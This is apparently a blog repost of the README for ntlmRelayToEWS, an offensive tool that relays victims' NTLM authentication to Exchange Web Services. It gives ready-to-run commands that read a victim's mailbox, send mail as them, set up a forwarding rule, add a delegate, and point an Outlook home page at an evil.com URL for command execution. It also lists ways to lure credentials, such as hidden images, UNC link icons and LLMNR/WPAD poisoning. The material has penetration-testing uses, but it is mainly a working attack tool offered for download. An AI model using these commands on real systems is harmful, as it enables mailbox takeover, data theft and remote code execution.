NtlmRelayToEWS – Ntlm Relay Attack To Exchange Web Services
Discription

[![](https://2.bp.blogspot.com/-sHIUV1BfCXE/W3TdRLJfE_I/AAAAAAAAMKk/huTqSQZ-pxsW5z7EQZHgBLLsr5gYJpOFQCLcBGAs/s640/NtlmRelayToEWS.png)]()

**ntlmRelayToEWS** is a tool for performing ntlm relay attacks on Exchange Web Services (EWS). It spawns an SMBListener on port 445 and an HTTPListener on port 80, waiting for incoming connection from the victim. Once the victim connects to one of the listeners, an NTLM negociation occurs and is relayed to the target EWS server.

Obviously this tool does **NOT** implement the whole EWS API, so only a handful of services are implemented that can be useful in some attack scenarios. I might be adding more in the future. See the ‘usage’ section to get an idea of which EWS calls are being implemented.

**Limitations and Improvements**

**Exchange version**:

I’ve tested this tool against an **Exchange Server 2010 SP2** only (_which is quite old admitedly_), so all EWS SOAP request templates, as well as the parsing of the EWS responses, are only tested for this version of Exchange. Although I’ve not tested myself, some reported this tool is also working against an **Exchange 2016 server**, out of the box (_ie: without any changes to the SOAP request templates_).

In case those SOAP requests wouldn’t work on another version of Exchange, it is pretty easy to create the SOAP request templates to match a newer version by using the Microsoft EWS Managed API in trace mode and [capture]() the proper SOAP requests (_that’s how I did it !_).

**EWS SOAP client**:

I would have loved to use a SOAP client in order to get a proper interface for automatically create all SOAP requests based on the Exchange WSDL. I tried using ‘**zeep**’ but I banged my head on the wall to get it working with the Exchange WSDL as it requires to download external namespaces and as such requires an internet connection. Also, with ‘zeep’, the use of a custom transport session requires a `Requests.session` which is not the type of HTTP(S) session we have by default with the HTTPClientRelay: it would have required either to refactor the HTTPClientRelay to use ‘_Requests_’ (_/me lazy_) or to simply get zeep to create the messages with `zeep.client.create_message()` and then send it with the relayed session we already have. Or is it because I’m a lame developper ? oh well…

**Prerequisites**
**ntlmRelayToEWS** requires a proper/clean install of [Impacket](). So follow their instructions to get a working version of Impacket.

**Usage**
**ntlmRelayToEWS** implements the following attacks, which are all made on behalf of the relayed user (_victim_).
Refer to the help to get additional info: `./ntlmRelayToEWS -h`. Get more debug [information]() using the `–verbose` or `-v` flag.
**sendMail**
Sends an HTML formed e-mail to a list of destinations:

./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r sendMail -d “[email protected],[email protected]” -s Subject -m sampleMsg.html

**getFolder**
Retrieves all items from a predefined folder (_inbox, sent items, calendar, tasks_):

./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r getFolder -f inbox

**forwardRule**
Creates an evil forwarding rule that forwards all incoming message for the victim to another email address:

./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r forwardRule -d [email protected]

**setHomePage**
Defines a folder home page (_usually for the Inbox folder_) by specifying a URL. This technique, uncovered by SensePost/Etienne Stalmans allows for **arbitray command execution** in the victim’s Outlook program by forging a specific HTML page: [Outlook Home Page – Another Ruler Vector]():

./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r setHomePage -f inbox -u https://path.to.evil.com/evilpage.html

**addDelegate**
Sets a delegate address on the victim’s primary mailbox. In other words, the victim delegates the [control]() of its mailbox to someone else. Once done, it means the delegated address has full control over the victim’s mailbox, by simply opening it as an additional mailbox in Outlook:

./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r addDelegate -d [email protected]

**How to get the victim to give you their [credentials]() for relaying ?**
In order to get the victim to send his credentials to ntlmRelayToEWS you can use any of the following well known methods:

* Send the victim an e-mail with a hidden picture which ‘src’ attribute points to the ntlmRelayToEWS server, using either HTTP or SMB. Check the `Invoke-SendEmail.ps1` script to achieve this.
* Create a link file which ‘icon’ attribute points to the ntlmRelayToEWS using a UNC path and let victim browse a folder with this link
* Perform LLMNR, NBNS or WPAD poisonning (_think of Responder.py or Invoke-Inveigh for instance_) to get any corresponding SMB or HTTP trafic from the victim sent to ntlmRelayToEWS
* other ?

**Author**
Arno0x0x – [@Arno0x0x]()

**[Download NtlmRelayToEWS]()**Read More

Back to Main

Subscribe for the latest news: